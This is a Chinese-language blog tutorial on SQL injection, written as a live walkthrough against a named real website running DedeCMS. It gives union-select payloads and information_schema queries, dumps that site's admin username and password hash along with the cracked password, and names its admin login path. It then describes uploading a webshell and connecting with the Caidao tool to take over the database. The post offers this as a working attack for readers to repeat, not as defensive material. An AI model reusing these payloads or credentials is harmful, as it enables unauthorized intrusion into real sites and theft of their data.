博客已轉移到:PHP開發
注:此文章獻給那些還對注入不怎麼理解的人學習!
注入點:http://www.51team.cn/newmess.php?id=138
找到注入點後猜字段,可用 order by 1 猜解,order by不可用時,可用union 聯合查詢!
我這裏猜解到的字段是22, 上圖:
接下來爆顯示位!語法: and 1=2 union select1,2,4,5,...,22 字段多少就輸入多少,中間太常,省略了!
然後回車打開,頁面出現了一個9的數字!如圖:
然後我們來查詢下是什麼版本,用戶名,數據庫!
version() 版本database()當前數據庫 user() 用戶,要查詢什麼就把剛纔爆出9的顯示位替換掉,如圖:
這是版本號,如果要查詢用戶名就把瀏覽器上面的9替換成 user()就行了!
這是我查出來
版本號:5.1.32-community
數據庫:51teamcom
用戶名:51teamcom 數據庫和用戶名一樣!
接下來我們來報表了, 語法 :FROM information_schema.TABLESwhere table_schema=database() limit 0,1 把瀏覽器裏
的9改成 table_name ,然後回車,你就會看到表了,第一個表是:dede_addonarticle 我們只要爆出的管理員的表就行了!
我們繼續爆,每爆一個就得修改下這個語法 limit 0,1 爆第2個的時候把0改成1,比如:limit 1,1 爆第3個的時候繼續+1 如:limit 2,1 php中0是第一位!
這是我爆出來的表:
dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset
織夢的程序!
其中dede_admin 應該就是管理員的表了!我們爆下看!
爆之前,我們先把dede_admin 轉換成16進制的,就是這個 646564655F61646D696E
語法:information_schema.columns WHEREtable_name=0x646564655F61646D696E limit0,1 還是跟上面一樣,爆第幾個就修改數字 0 ,把我們剛纔轉換的16進制放到0x後面,0x不要動,然後把顯示位9的數字改成 column_name 然後就行!
我爆的段:id,userid,pwd,uname,tname,email pwd應該就是密碼,uname應該是賬號,我們試試!
and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin 把瀏覽器裏面的語法全部去掉,剩***入點就行,就是這樣;
http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin 然後回車!
然後把9替換成剛纔我爆出來的字段 我替換了uname和pwd,開了2個瀏覽器!
用戶是:admin密碼是:d9d2b2de067864194059 密碼加密的,可到cmd5.com解密 如圖:
密碼解出來了,這個 bx2013 ,接下來找後臺,可以用軟件掃或者谷歌找!我找出來了:
http://www.51team.cn/web_admin/login.php
成功登陸:
隨便找個上傳點就行,然後上傳馬,先掛個txt吧,嘿嘿!http://www.51team.cn/a.txt
接下來,***咯!
***可以上傳***馬,也可以用菜刀,我就用菜刀的吧,方便!隨便找個php文件添加一句話!
好,連接了
如果你是用網馬脫的話,就得看網站配置文件conn.php 裏面的數據庫用戶名和密碼!
連接後,點網站列表,然後在網址那裏右鍵點擊數據庫管理,然後打開一個窗口,那個窗口就是數據庫了!如圖:
歡迎加羣:QQ羣:252799167